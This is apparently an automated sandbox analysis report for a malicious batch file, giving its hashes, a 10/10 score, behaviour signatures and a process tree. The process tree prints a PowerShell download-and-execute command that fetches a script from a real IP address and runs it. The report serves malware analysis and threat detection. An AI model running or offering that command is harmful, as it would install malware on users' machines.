Overview

overview

10

Static

static

01619b0494...eb.bat

windows7_x64

10

01619b0494...eb.bat

windows10_x64

10

Analysis

  • max time kernel
    21s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    03-09-2020 19:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    01619b049472811b76565ddd589bc9eb.bat

  • Size

    221B

  • MD5

    3ab48b49f0f231c470e42900d1a7e59f

  • SHA1

    a25a30cfa56bd61d0484e2a37fd86fb365edf99a

  • SHA256

    d58ef2af3b2f9387c21e0e0b5b81594a995dc4a09e8befa0f0d95700bc9a342c

  • SHA512

    f6a7e33125726389dd01e7cfcce2286050cc48d56b465c719f8d5bfe6facef0fbf83ad47111c52ecd3d67f090e394dfaa842013f71b9b7d81f2c0e8c4e9ab4e5

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\01619b049472811b76565ddd589bc9eb.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb');Invoke-BSCFPHAYQBPUGG;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1388

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1388-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1388-1-0x0000000073CC0000-0x00000000743AE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1388-2-0x0000000000890000-0x0000000000891000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-3-0x00000000049F0000-0x00000000049F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-4-0x0000000002590000-0x0000000002591000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-5-0x0000000002760000-0x0000000002761000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-8-0x0000000005680000-0x0000000005681000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-13-0x0000000006080000-0x0000000006081000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-14-0x0000000006110000-0x0000000006111000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-21-0x00000000062A0000-0x00000000062A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1388-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

    Download